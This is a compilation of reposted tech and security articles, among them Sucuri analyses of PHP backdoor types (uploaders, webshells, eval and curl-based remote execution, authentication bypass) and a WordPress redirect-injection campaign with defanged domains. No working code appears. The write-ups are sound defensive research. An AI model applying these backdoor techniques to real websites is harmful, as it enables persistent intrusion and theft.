Blog

UI Expands Lab With Anechoic Chambers to Deliver Products Faster

Ubiquiti’s Salt Lake City-based engineering team has expanded its regulatory compliance and engineering development laboratory to include state-of-the-art anechoic chambers: the 10/5/3 m Multi-Axis Anechoic Chamber & the 3 m Anechoic Dome-Roofed Chamber.

This laboratory expansion gives us capabilities to speed up product development cycles, ensuring product quality and improving our time to market in a growing number of countries.

10/5/3 m Multi-Axis Anechoic Chamber

Chamber 1: Frankonia SAC-10 Plus Triton chamber with three measurement axes

The Frankonia SAC-10 Plus Triton chamber (19.21 m x 12.08 m x 8.18 m) is the top-of-the-line model from the manufacturer. It’s the only one of its kind in the world outside the manufacturer’s lab.

The specialized “Triton” form factor allows us to have three different emission and immunity test setups in place at once:

  • Test Axis 1: Low-frequency emissions compliant with ANSI C.63.4 + CISPR 16-1-4 (NSA)
  • Test Axis 2: High-frequency and RF emissions compliant with ANSI C.63.10 + CISPR 16-1-4 (SVSWR)
  • Test Axis 3: Radiated RF Immunity compliant with IEC/EN61000-4-3 (FU)

With this setup, our engineers can perform the required electromagnetic interference (EMI) and electromagnetic susceptibility (EMS) procedures with reduced setup changes, saving hours of time with each iterative test. Keeping the same setup in place reduces the time needed to complete the tests and makes them reproducible.

The Device Under Test (DUT) is placed on a non-reflective (styrofoam) table on top of a rotating turntable. Extensive test automation actuates the test equipment, antennas, and turntable while performing the required tests at all angles.

Anechoic chambers offer excellent isolation against interference from the surrounding environment. Carefully designed and positioned absorbers significantly remove radio frequency (RF) reflections. The SAC-10 Plus Triton chamber provides a 9 kHz to 40 GHz measurement frequency range. The metal exterior shielding provides over 100 dB of attenuation from the outside world.

How much is 100 dB attenuation in practice? Consider a case with a tower-top macro LTE base station that has high-gain antennas at a distance of 5 m from the chamber. To get service inside the chamber, the phone needs at least -100 dBm signal level. With a typical equipment setup, the signal level remains below -100 dBm inside the chamber and there is no LTE service.

3 m Dome-Roofed Anechoic Chamber

Chamber 2: Frankonia SAC-3 Plus 3 m chamber with AmpliFi on the rotating measurement table

The other newly constructed chamber, the Frankonia SAC-3 Plus L (9.23 m x 6.53 m x 6.00 m), is a versatile, fully compliant Electromagnetic Compatibility (EMC) testing room. We use this chamber for emissions and immunity testing in parallel with the larger SAC-10 chamber.

The dome-shaped roof design combined with RF absorbers minimizes reflections and offers excellent measurement performance. The SAC-3 chamber provides over 110 dB isolation from the outside world. Similar to the larger chamber room, the fully automated test routines control the turntable and antenna height, as well as run the test equipment.

Anechoic — No Reflections

Electromagnetic waves are absorbed by the pyramid-shaped structures

Anechoic chambers provide significantly reduced reflections and external interference levels, making measurements repeatable and accurate.

Electromagnetic waves propagate, reflect, and refract differently depending on the frequency and surrounding structures. The following techniques are important for RF and anechoic chamber designs.

Design techniques for RF and anechoic chambers

While our chambers provide a drastic reduction in RF reflections, they are not intended to be completely anechoic by design (i.e. semi-anechoic).

Performing measurements in an anechoic chamber have certain unique consequences. Multiple-input, multiple-output (MIMO) technology used in Wi-Fi relies on multiple spatial signal paths created by reflections. Performance measurements, for example, throughput, require adding metallic RF-reflecting materials inside the chamber. Even in a perfect interference-free environment, in the absence of reflections and multipath propagation, Wi-Fi throughputs are low.

Control Room Hosts Test Equipment

Control room with test equipment

When a chamber’s door is closed, engineers work in the shielded control room with test equipment next to the chamber and oversee test progress. This eliminates any potential source of emissions from interfering with testing. Cameras inside the chamber help ensure the test setup remains intact with automated DUT position and antenna adjustments.

Accredited Accuracy, Shorter Time to Market

Governments heavily regulate RF, EMC, and safety testing. The Federal Communications Commission (FCC); Innovation, Science and Economic Development Canada (ISED); European Union directives (CE Mark), regulate RF devices and potential interference to licensed operations respectively for the US, Canada and European Union.

Since all regions and countries have their own regulations, the resulting testing effort for each new product is significant. The Salt Lake City lab’s new accreditation by the National Voluntary Laboratory Accreditation Program (NVLAP) of the National Institute of Standards and Technology (NIST) means our engineers can perform a broad range of performance and regulatory compliance tests quickly expediting product’s time-to-market.

These are the most common test requirements:

  • RF parameters
    • RF performance, limits, and requirements for transmitters
  • Radiated and conducted emissions
    • Limits unintentional emissions across various frequency bands and test mode
  • Radiated and conducted immunity
    • Test for product susceptibility to external radio energy, ensuring product reliability
  • Static discharge, surge, and fast transient immunity
    • Ensures that various magnitudes and types of voltage and current spikes can be withstood by the product without degradation of performance or abnormal behavior
  • Product safety
    • Tests to ensure international safety standards are met or exceeded to reduce the hazard to humans and the environment

      Source :
      https://blog.ui.com/2019/12/04/ui-expands-lab-with-anechoic-chambers-to-deliver-products-faster/

How to Enable a Pre-Boot BitLocker PIN on Windows

If you encrypt your Windows system drive with BitLocker, you can add a PIN for additional security. You’ll need to enter the PIN each time you turn on your PC, before Windows will even start. This is separate from a login PIN, which you enter after Windows boots up.

RELATED: How to Use a USB Key to Unlock a BitLocker-Encrypted PC

A pre-boot PIN prevents the encryption key from automatically being loaded into system memory during the boot process, which protects against direct memory access (DMA) attacks on systems with hardware vulnerable to them. Microsoft’s documentation explains this in more detail.

Step One: Enable BitLocker (If You Haven’t Already)

RELATED: How to Set Up BitLocker Encryption on Windows

This is a BitLocker feature, so you have to use BitLocker encryption to set a pre-boot PIN. This is only available on Professional and Enterprise editions of Windows. Before you can set a PIN, you have to enable BitLocker for your system drive.

Note that, if you go out of your way to enable BitLocker on a computer without a TPM, you’ll be prompted to create a startup password that’s used instead of the TPM. The below steps are only necessary when enabling BitLocker on computers with TPMs, which most modern computers have.

If you have a Home version of Windows, you won’t be able to use BitLocker. You may have the Device Encryption feature instead, but this works differently from BitLocker and doesn’t allow you to provide a startup key.

Step Two: Enable the Startup PIN in Group Policy Editor

Once you’ve enabled BitLocker, you’ll need to go out of your way to enable a PIN with it. This requires a Group Policy settings change. To open the Group Policy Editor, press Windows+R, type “gpedit.msc” into the Run dialog, and press Enter.

Head to Computer Configuration > Administrative Templates > Windows Components > BitLocker Drive Encryption > Operating System Drives in the Group Policy window.

Double-click the “Require Additional Authentication at Startup” Option in the right pane.

Select “Enabled” at the top of the window here. Then, click the box under “Configure TPM Startup PIN” and select the “Require Startup PIN With TPM” option. Click “OK” to save your changes.

Step Three: Add a PIN to Your Drive

You can now use the manage-bde command to add the PIN to your BitLocker-encrypted drive.

To do this, launch a Command Prompt window as Administrator. On Windows 10 or 8, right-click the Start button and select “Command Prompt (Admin)”. On Windows 7, find the “Command Prompt” shortcut in the Start menu, right-click it, and select “Run as Administrator”

Run the following command. The below command works on your C: drive, so if you want to require a startup key for another drive, enter its drive letter instead of c: .

manage-bde -protectors -add c: -TPMAndPIN

You’ll be prompted to enter your PIN here. The next time you boot, you’ll be asked for this PIN.

To double-check whether the TPMAndPIN protector was added, you can run the following command:

manage-bde -status

(The “Numerical Password” key protector displayed here is your recovery key.)

How to Change Your BitLocker PIN

To change the PIN in the future, open a Command Prompt window as Administrator and run the following command:

manage-bde -changepin c:

You’ll need to type and confirm your new PIN before continuing.

How to Remove the PIN Requirement

If you change your mind and want to stop using the PIN later, you can undo this change.

First, you’ll need to head to the Group Policy window and change the option back to “Allow Startup PIN With TPM”. You can’t leave the option set to “Require Startup PIN With TPM” or Windows won’t allow you to remove the PIN.

Next, open a Command Prompt window as Administrator and run the following command:

manage-bde -protectors -add c: -TPM

This will replace the “TPMandPIN” requirement with a “TPM” requirement, deleting the PIN. Your BitLocker drive will automatically unlock via your computer’s TPM when you boot.

To check that this completed successfully, run the status command again:

manage-bde -status c:

If you forget the PIN, you’ll need to provide the BitLocker recovery code you should have saved somewhere safe when you enabled BitLocker for your system drive.

Source :
https://www.howtogeek.com/262720/how-to-enable-a-pre-boot-bitlocker-pin-on-windows/

Android and Chrome Users Can Soon Generate Virtual Credit Cards to Protect Real Ones

Google on Wednesday took to its annual developer conference to announce a host of privacy and security updates, including support for virtual credit cards on Android and Chrome.

“When you use autofill to enter your payment details at checkout, virtual cards will add an additional layer of security by replacing your actual card number with a distinct, virtual number,” Google’s Jen Fitzpatrick said in a statement.

The goal, the search giant, said to keep payment information safe and secure during online shopping and protect users from skimming attacks wherein threat actors inject malicious JavaScript code to plunder credit card numbers and sell them on the black market.

The feature is expected to roll out in the U.S. for Visa, American Express, Mastercard, and Capital One cards starting this summer.

Interestingly, while Apple offers an option to mask email addresses via Hide My Email, which enables users to create unique, random email addresses to use with apps and websites, it’s yet to offer a similar option for creating virtual credit cards.

The development comes a week after Google, Apple, and Microsoft banded together to accelerate support for a common passwordless sign-in standard that allows “websites and apps to offer consistent, secure, and easy passwordless sign-ins to consumers across devices and platforms.”

Additionally, Google said it’s expanding phishing protections in Google Workspace to Docs, Slides and Sheets, and that it plans to debut a new “My Ad Center” later this year to give users more control over personalized ads on YouTube, Search, and Discover feed.

What’s more, users would be able to request personally identifiable information such as email, phone number, or home address to be removed from search results through a new tool that will be accessible from the Google App.

Also coming is a new Account Safety Status setting that will “feature a simple yellow alert icon on your profile picture that will flag actions you should take to secure your account.”

Other key privacy and security features unveiled at Google I/O 2022 include support for end-to-end encryption for group conversations in the Messages app for Android and the availability of on-device encryption for Google Password Manager.

Source :
https://thehackernews.com/2022/05/blog-post.html

Examining Emerging Backdoors

Next up in our “This didn’t quite make it into the 2021 Threat Report, but is still really cool” series: New backdoors!

Backdoors are a crucial component of a website infection. They allow the attackers ongoing access to the compromised environment and provide them a “foot in the door” to execute their payload. We see many different types of backdoors with varying functionality.

When our malware research team is provided with a new backdoor they need to write what’s called a “signature” to ensure that we detect and remove it in future security scans. Signatures need names, and over the years we’ve developed something of a taxonomy naming system for all of the different malware that we come across.

In this article we’re going to explore all the different categories of signatures for newly-discovered backdoors throughout the year 2021.

How do Backdoors Work?

HTTP requests to websites typically fall into one of the following categories:

  • POST – sending data to a website
  • GET – requesting data from a website
  • COOKIE – data (such as session data) saved from a website
  • REQUEST – a conjunction of all/any of the three

We see all sorts of different backdoors while cleaning up compromised websites. Sometimes they use one of these types of requests, or a combination of multiple different types.

We’ve broken all newly generated signatures from 2021 down for further analysis into the following categories:

A graph showing the distribution of new backdoor signatures generated in 2021.

Uploaders

By far the most common type of backdoor found in 2021 was an uploader: That is, a PHP script that allows the attackers to upload any file that they want. These malicious files allow anyone with the correct URL path, parameters and (occasionally) access credentials to upload whichever files they want to the web server. Typically, bad actors use these backdoors to upload a webshell, spam directory, dropper, or other type of file giving them full control over the environment.

To avoid detection, attackers are always tweaking their malware by using new methods of obfuscation or concealing backdoors within legitimate-looking images, core files, plugins, or even themes — this can make malicious file uploaders difficult to detect during a casual site review.

Once an attacker has identified a vulnerable environment that they can get a foothold in, planting the uploader is often the next step. After that they have enough access to upload more complicated access points such as a webshell.

Of course there are legitimate uploader scripts, as many websites require functionality to allow users to upload photos or other content to the website. To mitigate risk, secure uploader scripts contain strict rules on how they are able to behave:

  • Only certain file types/extensions are allowed (usually image, or document files)
  • May require authorisation cookies to be set
  • May place files in a restricted directory with PHP execution disabled
  • May disable direct access and instead need to be called by the existing CMS structure

Malicious uploaders, on the other hand, have no such restrictions as they are designed to upload malicious files and PHP scripts.

A malicious uploader script

WebShells

Webshells are a classic type of malware that have been used by attackers for many years. They are administrative dashboards that give the attacker full access to the files and often provide a large amount of information about the hosting environment including operating system, PHP settings, web server configurations, file management, and SQL connections.

The classic FilesMan shell continues to be very popular with attackers. In 2021 we generated 20 new signatures related to new filesman variants alone, not including hack tools which grab filesman shells from remote servers.

Interestingly, a lot of malicious web shells provide far superior functionality than a lot of file managers provided by web hosting providers.

A malicious web shell backdoor

Misc RCE

Sometimes remote code execution backdoors are a little more complicated, or just rely on more basic/generic $_REQUEST calls. This is a PHP global array that contains the content of GETPOST and COOKIE inputs. The content of these variables could be anything and the attacker can fill them — e.g. with the payload — which is then processed. Sometimes the entire payload code is stored there and only very simple code snippets are injected into legitimate files. Such a snippet only loads and executes the content of these variables.

Other times, RCE backdoors make use of multiple different functions and request types.

A remote code execution backdoor

Generic

Not falling into any particular category are our collection of “generic” backdoors. They tend to use a mixture of different functions and methods to maintain backdoor access to the environment. Some are heavily obfuscated and others are mostly in plain text, but what unites them is that they don’t rely on any one technique to backdoor the environment in which they reside.

A generic, malicious backdoor

FILE_GET_CONTENTS

The PHP function file_get_contents fetches a local file or remote file. As far as backdoors are concerned, attackers misuse this function to grab malicious files located on other websites or servers and add it to the victim’s website. This allows them to host the actual malicious content elsewhere, while maintaining all of the same functionality on the victim environment.

Here we have a very simple backdoor using file_get_contents to grab a backdoor from a malicious server. The actual address is obfuscated through use of a URL shortening service:

A backdoor which uses file_get_contents

The footprint of this malware is very small as the payload resides elsewhere, but the functionality is potentially huge.

Remote Code Execution Backdoors

Not to be confused with remote code execution vulnerabilities, these backdoors are crafted to take whatever command is issued to it by the attacker and execute it in the victim’s environment. These PHP backdoors are often more complex than uploaders and allow the attackers more leeway in terms of how they can interact with the victim website.

If a request is sent that matches the parameters of the backdoor it will execute whichever command the attacker instructs so long as it doesn’t get blocked by any security software or firewall running within the environment.

A remote code execution backdoor

Here’s another example of a quite well hidden RCE backdoor in a Magento environment:

A well-hidden RCE backdoor in a Magento environment

Attackers make heavy use of the eval function which executes the command in the victim environment.

FILE_PUT_CONTENTS

These backdoors utilise the PHP function file_put_contents which will write the instructed content to a file on the victim environment.

Here is an example of such a backdoor lodged in a WordPress configuration file wp-config.php:

A backdoor which uses file_put_contents

This backdoor writes the specified malicious content into the file structure of the victim website given the correct parameters in the attacker’s request, allowing them to infect other files on the server with the content of their choice.

cURL

The curl() function facilitates the transmission of data. It can be used maliciously to download remote code which can be executed or directly displayed. This way, malware authors are able to create a small backdoor that only has this curl functionality implemented while the payload itself can be downloaded from a remote source.

It has many uses, and as such can be misused in many ways by attackers. We have seen it used frequently in credit card skimmers to transmit sensitive details to exfiltration destinations. It can also be used in RCE backdoors:

A backdoor which uses CURL

Since the attackers have crafted a backdoor to (mis)use curl, and they control the parameters under which it will function, in this way they are able to send or receive malicious traffic to and from the website, depending on how the backdoor is designed.

Authentication Bypass

These types of backdoors are most often seen in WordPress environments. They are small PHP scripts which allow the attacker to automatically log in to the administrator panel without needing to provide any password.

As long as they include the database configuration file in the script then they are able to set the necessary cookies for authorization, as seen in this example here:

A backdoor which bypasses normal authentication

The existence of such backdoors presents a case that additional authentication requirements should be employed within website environments. Protecting your admin panel with our firewall’s protected page feature is a great way to do this.

If you’re not a user of our firewall there are a lot of other ways that your admin panel can be protected.

Basic RCE via POST

Backdoors that take input through POST requests are quite common and many of the backdoor types that we’ve seen contain such functionality. Some of them, however, are quite small and rely exclusively on POST requests.

The example below shows one such backdoor, coupled with basic password protection to ensure that the backdoor is not used by anybody that does not have access to the password.

A basic remote code execution backdoor which uses POST

Fake Plugins

Another tactic that we’ve seen attackers use is the use of fake plugins. This is frequently used as a payload to deliver spam and malware, since WordPress will load the components present in the ./wp-content/plugins directory.

We’ve also seen attackers use these plugins as backdoors to maintain access to compromised environments.

A fake plugin in a WordPress environment

Since admin panel compromises are a very common attack vector, the usage of fake/malicious backdoor plugins is quite popular with attackers.

System Shell Backdoors

Attackers have also written malware that interacts with the hosting environment itself and will attempt to run shell commands via PHP scripts in the environment. This is not always possible, depending on the security settings of the environment, but here’s an example of one such backdoor:

A system shell backdoor

If system() is disabled in the environment then these will not work, so the functionality of such backdoors will be limited by the security settings in the host.

COOKIE Based Backdoors

Some malware creators use COOKIES as a storage for various data. These can be decryption keys  used to decode an otherwise inaccessible payload, or even the entire malicious payload itself.

A cookie based backdoor

CREATE_FUNCTION

The create_function() is often used by malware instead of (or in conjunction with) the eval() function to hide the execution of the malicious code. The payload is encapsulated inside the crafted custom function, often with an obfuscated name to make the functionality less clear.

This function is then called somewhere else within the code, and thus the payload is evaluated. Backdoors have been found to abuse this to place their payload back on the infected website after it was removed.

A backdoor which creates a malicious function in the victim environment

RCE via GET

Backdoors have also been seen using GET requests for input, rather than POST requests. In the example below we can see that the backdoor will execute the malicious payload if a GET request contains a certain string.

A remote code execution backdoor which uses GET

This allows the attackers to restrict the usage of the backdoor to only those who know the exact parameters to specify in the malicious GET request to the website. If the correct parameters are given then the backdoor will execute its intended function.

Database Management Backdoors

Most often attackers will misuse tools such as Adminer to insert malicious content into the victim website’s database, but occasionally we have seen them craft their own database management tools. This allows them to insert admin users into the website as well as inject malicious JavaScript into the website content to redirect users to spam or scam websites or steal credit card information from eCommerce environments.

A database management backdoor

Conclusion & Mitigation Steps

Backdoors play a crucial role for the attackers in a huge number of website compromises. Once the attackers are able to gain a foothold into an environment their goal is to escalate the level of access they have as much as possible. Certain vulnerabilities will provide them access only to certain directories. For example, a subdirectory of the wp-content/uploads area of the file structure.

Often the first thing they will do is place a malicious uploader or webshell into the environment, giving them full control over the rest of the website files. Once that is established they are able to deliver a payload of their choosing.

If default configurations are in place in a standard WordPress/cPanel/WHM configuration a single compromised admin user on a single website can cause the entire environment to be infected. Attackers can move laterally throughout the environment by the use of symlinks even if the file permissions/ownership are configured correctly.

Malicious actors are writing new code daily to try to evade existing security detections. As security analysts and researchers it’s our job to stay on top of the most recent threats and ensure that our tools and monitoring detect it all.

Throughout the year 2021 we added hundreds of new signatures for newly discovered backdoors. I expect we’ll also be adding hundreds more this year.

If you’d like us to help you monitor and secure your website from backdoors and other threats you can sign up for our platform-agnostic website security services.

Source :
https://blog.sucuri.net/2022/05/examining-emerging-backdoors.html

Massive WordPress JavaScript Injection Campaign Redirects to Ads 

Our remediation and research teams regularly find malicious redirects on client sites. These infections automatically redirect site visitors to third-party websites with malicious resources, scam pages, or commercial websites with the intention of generating illegitimate traffic.

As outlined in our latest hacked website report, we’ve been tracking a long-lasting campaign responsible for injecting malicious scripts into compromised WordPress websites. This campaign leverages known vulnerabilities in WordPress themes and plugins and has impacted an enormous number of websites over the year — for example, according to PublicWWW, the April wave for this campaign was responsible for nearly 6,000 infected websites alone.

Since these PublicWWW results only show detections for simple script injections, we can assume that the scope is significantly larger.

Investigating Obfuscated JavaScript in WordPress Sites

We recently investigated a number of WordPress websites complaining about unwanted redirects. Interestingly enough, they were found to be related to a new wave of this massive campaign and were sending website visitors through a series of website redirects to serve them unwanted ads.

The websites all shared a common issue — malicious JavaScript had been injected within their website’s files and the database, including legitimate core WordPress files such as:

  • ./wp-includes/js/jquery/jquery.min.js
  • ./wp-includes/js/jquery/jquery-migrate.min.js

Once the website had been compromised, attackers had attempted to automatically infect any .js files with jQuery in the names. They injected code that begins with “/* trackmyposs*/eval(String.fromCharCode…”

However, it was clear that the attackers had taken some measures to evade detection and had obfuscated their malicious JavaScript with CharCode, as seen below.

Malicious JavaScript injection obfuscated with CharCode
Malicious JavaScript injection obfuscated with CharCode

Once deobfuscated, the true behavior of the injection emerged.

Deobfuscated malicious JavaScript redirects site visitors on page load
Deobfuscated malicious JavaScript redirects site visitors on page load

This JavaScript was appended under the current script or under the head of the page where it was fired on every page load, redirecting site visitors to the attacker’s destination.

Malicious Chain of Redirects

To accomplish these redirects, the malicious injection creates a new script element with the legendarytable[.]com domain as the source.

The code from the legendarytable[.]com domain then calls to a second external domain — local[.]drakefollow[.]com — which calls from links[.]drakefollow[.]com, redirecting the site visitor to one of many different domains including:

  • bluestringline[.]com
  • browntouchmysky[.]com
  • redstringline[.]com
  • whitetouchmysky[.]com
  • gregoryfavorite[.]space
  • gregoryfavorite[.]top
  • pushnow[.]net/

At this point, it’s a free for all. Domains at the end of the redirect chain may be used to load advertisements, phishing pages, malware, or even more redirects.

From a site visitor’s perspective, they’ll simply see the following malware page before landing on the final destination.

Malicious redirect landing page
Malicious redirect landing page

This page tricks unsuspecting users into subscribing to push notifications from the malicious site. If they click on the fake CAPTCHA, they’ll be opted in to receive unwanted ads even when the site isn’t open — and ads will look like they come from the operating system, not from a browser.

These sneaky push notification opt-in maneuvers also happen to be one of the most common ways attackers display “tech support” scams, which inform users that their computer is infected or slow and they should call a toll-free number to fix the problem.

Detecting Malicious JavaScript via SiteCheck

Client-side redirects are initiated by the site visitors’ browser once the infected web page has been loaded. Since this particular infection is found client-side, remote website scanners like SiteCheck can help scan a website and identify this malware.

Here’s an example of a SiteCheck results page for this specific campaign.

SiteCheck results for malicious Javascript injection
SiteCheck results for malicious Javascript injection

At the time of writing, PublicWWW has reported 322 websites impacted by this new wave for the malicious drakefollow[.]com domain. Considering that this count doesn’t include obfuscated malware or sites that have not yet been scanned by PublicWWW, the actual number of impacted websites is likely much higher.

Conclusion & Mitigation Steps

Our team has seen an influx in complaints for this specific wave of the massive campaign targeting WordPress sites beginning May 9th, 2022, which has impacted hundreds of websites already at the time of writing.

It has been found that attackers are targeting multiple vulnerabilities in WordPress plugins and themes to compromise the website and inject their malicious scripts. We expect the hackers will continue registering new domains for this ongoing campaign as soon as existing ones become blacklisted.

If you believe that your website has been infected with malicious JavaScript or you have found unwanted redirects to spam or ads on your site, you can use our free remote website scanner to detect the malware.

Website owners who have identified malware on their website can leverage the instructions found in our hacked WordPress cleanup guide  — and, as always, we’re happy to help clean up an infection if you need a hand.

Source :
https://blog.sucuri.net/2022/05/massive-wordpress-javascript-injection-campaign-redirects-to-ads.html

Gmail Is Disabling Less Secure Apps: What To Do Next

Google has announced that it’s disabling the Less Secure Apps feature on some Google accounts from May 30th, 2022.

If you’re using Gmail SMTP details with our Other SMTP mailer, you may have difficulty sending emails when this feature is disabled.

We know that many of our customers rely on Gmail to send emails from WordPress and we wanted to provide some information so that you can avoid deliverability problems.

What Is Less Secure Apps in Gmail?

Less Secure Apps is a feature in Gmail that allows software and devices to sign in to your Gmail account with your main Google username and password.

Allow Less Secure Apps setting in Google account

Up until now, it was possible to send emails through Gmail SMTP with this setting turned on.

Now, Google has decided to begin phasing out Less Secure Apps from May 30th, 2022. Google Workspace and Google Cloud Identity users won’t be affected right away, but support for Less Secure Apps will still be phased out for those users at a later date.

We’ve recommended app passwords for some time, but some customers have chosen to use Less Secure Apps since it’s a little more straightforward. Now that the feature is being retired, all users will need to switch to app passwords or use a different mailer.

How to Switch From Less Secure Apps

If you’re using WP Mail SMTP, here are the options available.

In This Article

Option 1: Switch to the Gmail Mailer

WP Mail SMTP has a dedicated Gmail mailer that connects to the Google API to send emails from WordPress.

Our Gmail mailer is available in both the Lite and Pro versions of our plugin.

It’s also more secure than sending emails through the SMTP protocol.

WP Mail SMTP Setup Wizard Choose Mailer

To use the Gmail mailer, you’ll need to set up a free Google Cloud Console account and generate an API key. You’ll find step-by-step instructions in our doc on how to set up the Google Workspace / Gmail mailer in WP Mail SMTP.

Option 2: Use an App Password

If you’d like to continue using the Other SMTP mailer in WP Mail SMTP, you can set up an app password in your Google account.

An app password works like an alternate password for your account. It can only be used by the applications you share it with, so it’s more secure than sharing your primary password.

Add a name for your app password

If you’d like to use an app password, you’ll need to turn on two factor authentication for your Google account first.

After that, you can create an app specific password for WP Mail SMTP in the security settings for your Google account.

App password generated for WP Mail SMTP

If you’d like to start now, we’ve got step-by-step instructions in our doc on how to set up the Other SMTP mailer in WP Mail SMTP.

Note: any time you change your main Google account password, it will deactivate your app passwords as well. If you change your password frequently, this may not be the best workaround.

Option 3: Switch to a New Mailer

If you’re not set on using Gmail, WP Mail SMTP has a ton of other mailers that use secure, API-based connections to send email from WordPress.

Our recommended mailers are listed at the top of the Setup Wizard.

SendLayer mailer in WP Mail SMTP

Here are some more details on our top mailers:

  • SendLayer: Our #1 recommended mailer and one of the easiest mailers to use with WP Mail SMTP. Once you’ve added DNS records to your domain, all you need is an API key. You can start with a trial and send 500 emails for free, then upgrade to a paid plan from $5/ month (paid annually).
  • SMTP.com: Free for 30 days, then priced from $25/ month. SMTP.com is an industry leader and has a track record of great email deliverability dating back over 20 years.
  • Sendinblue: If you’re testing Gmail alternatives, Sendinblue could be a good choice. You can get started without a credit card and upgrade to a plan with more capacity when you’re ready.

To switch your mailer, head to your WP Mail SMTP settings and click the Launch Setup Wizard button.

Launch Setup Wizard button

The Setup Wizard will walk you through the connection steps.

If these mailers aren’t right for you, you can also send through Microsoft 365, SendGrid, Mailgun, Amazon SES, and many more secure, API-based email providers. Here’s a complete guide to all of our mailers to help you decide.

How to Get Help with WP Mail SMTP

We understand that making changes to your mailer can be challenging, but we’re here to help!

If you’re using WP Mail SMTP Lite, you can get assistance on our WordPress.org support forum.

If you’re using any paid version, you can log in to your account and open a ticket. As a valued customer, you’ll get priority support when updating your mailer settings.

Source :
https://wpmailsmtp.com/gmail-less-secure-apps/

ShieldPRO 15.0 Upgrade Guide

ShieldPRO 15.0 for WordPress is a major release. 
We’ve taken steps to improve the Shield Security Dashboard navigation menu and the Overview section UI making it much easier to secure your WordPress site by quickly identifying areas of improvement. Also, the original WordPress Admin Dashboard widget was pretty basic, so we’ve completely revamped it with some of your latest site activity. This guide outlines what have been added/removed, changed, or improved and what fixes we’ve made.

Firstly, we’re going to explain what major changes are made and which options you’d need to review.

New Added Features

For 15.0 release we added

  • Block Username Fishing option

This feature is now a Bot Signal which is recorded in the Activity Log and triggers offenses. 

You can use this option to block the ability to discover WordPress usernames based on author IDs. When enabled, any URL requests containing “author=” will be killed.

This option is accessible from within WP Lockdown module > Obscurity:

The new Security Rules Engine is the new foundation of how Shield will handle security for nearly all WordPress requests. It’s accessible from within the main navigation menu > Tools section.

This article outlines what brought this about, what the Rules Engine is and does, and how it will inform future development and our approach to WordPress Security.

Changes

Change 1: All-New Security Overview page

We’ve broken up the plugin into 7 key areas and gathered configuration options and conditions of the site under each one. We give each component a weighted score and calculate an overall percentage. 

You can see your score within each area and click “Analysis” to get a clear breakdown of what constitutes that score.

Example, Site Scanning area:

Change 2: All-New Dashboard WidgetSimilar to the Security Overview we offer some visibility to the workings of the Shield plugin right on the WordPress Dashboard, using the built-in widget area.Currently it shows your

  • security overview progress
  • recently blocked IPs
  • recent offending IPs
  • recent user sessions
  • jump links to key plugin areas

Change 3: New Template-Based Block Pages

When triggering the Shield defenses, Shield now provides a much more visitor-friendly block page that outlines exactly what’s happened. It’ll provide details of why the block occurred and what the visitor can do about it. Please see below examples of the new blocking pages.

General IP Blocking Page (non-logged in users)

General IP Blocking Page (logged in users)

Firewall Blocking Page

Username Fishing Blocking Page

Change 4: Audit Trail (now renamed to Activity Log) and Traffic Log: Direct access to the IP analysis

In the previous plugin release, when you click an IP address from within Audit Trail or Traffic Log, you were directed to the IP Analysis page in a separate tab.

Now, you can analyse IP directly from within Audit Trail (Activity Log) Traffic Log. Please see below examples.

From Within Audit Trail (Activity Log)

From Within Traffic Log

Change 5: Option Removed: Legacy Comment SPAM Detection

We’ve completely removed the older, less reliable comment spam detection using Javascript and CAPTCHAs. Please use the newer AntiBot Detection EngineChange 6: Option Removed: Auto-Filter Scan ResultsShield will now filter unnecessary scan results automatically.

This option can now be adjusted using a WP filter. Change 7: Deprecated: Options For CAPTCHA and GASP Bot Checking On WordPress Login FormsThe options to use CAPTCHA and/or GASP Bot Checking for WordPress Login SPAM has been deprecated. These options are replaced with the AntiBot Detection Engine and will be completely removed in a future release. 

Change 8: Audit Trail Renamed to Activity Log

Improvements

For 15.0 release we’ve made the following improvements

  • Improved Plugin Navigation
    This release brings further enhancements in this area – the new dynamic page loading and smoother navigation.
  • Improved Visitor IP Source Detection
    We’ve built a Javascript utility which will determine your best visitor IP source. This should, hopefully, solve this problem of everyone going forward, even if your host is badly configured (there are many such hosts!).
  • Massive Performance Optimisations
    As part of our new approach to security with the Security Rules Engine, we’ve taken the opportunity to rip out legacy code and optimise many other areas. We’ve eliminated unnecessary MySQL queries and redesigned core components to be more efficient with how they store data.
  • New Filters: Adjust scanner notices about plugin/theme update/active status
    You can now use filters to adjust whether Shield warns about inactive plugins/themes or those with updates. 
  • A New WP Filter To Add Custom Shield Template Directory
    If you’re looking to adjust some of our page templates, such as the block pages, you can now provide custom templates more easily using the new filter. 
  • Option Removed: XML-RPC bypass option, under the General settings:


    This option can now be adjusted using a WP filter. 

Fixes

For 15.0 release, we’ve made the following fixes

  • 15.0 release
    • Broken password reset links in some cases when using hidden login page
    • Help ensure forward compatibility for sites with newer TWIG libraries also installed
    • Fix for some scan results browsing errors

For more information on Shield 15.0 release, read this blog article here.

Source :
https://help.getshieldsecurity.com/article/461-shieldpro-15-0-upgrade-guide

Ferrari subdomain hijacked to push fake Ferrari NFT collection

One of Ferrari’s subdomains was hijacked yesterday to host a scam promoting fake Ferrari NFT collection, according to researchers.

What makes the scam particularly interesting is the fact that the luxury carmaker had earlier announced plans to launch NFTs in partnership with tech firm Velas. 

The Ethereum wallet associated with the cryptocurrency scam appears to have collected a few hundred dollars before the hacked subdomain was shut down.

Ferrari’s site featured ‘Mint your Ferrari’ crypto scam

On Thursday, ethical hacker and bug bounty hunter Sam Curry reported seeing one of Ferrari’s subdomains forms.ferrari.com hosting a fake NFT (Non-Fungible Token) scam.

An NFT, or Non-Fungible Token, is data stored on a cryptocurrency blockchain that a digital certificate has signed to prove that it is unique and cannot be copied.

Last year, Ferrari announced plans to launch NFT products in partnership with tech firm Velas, making this scam all very convincing.

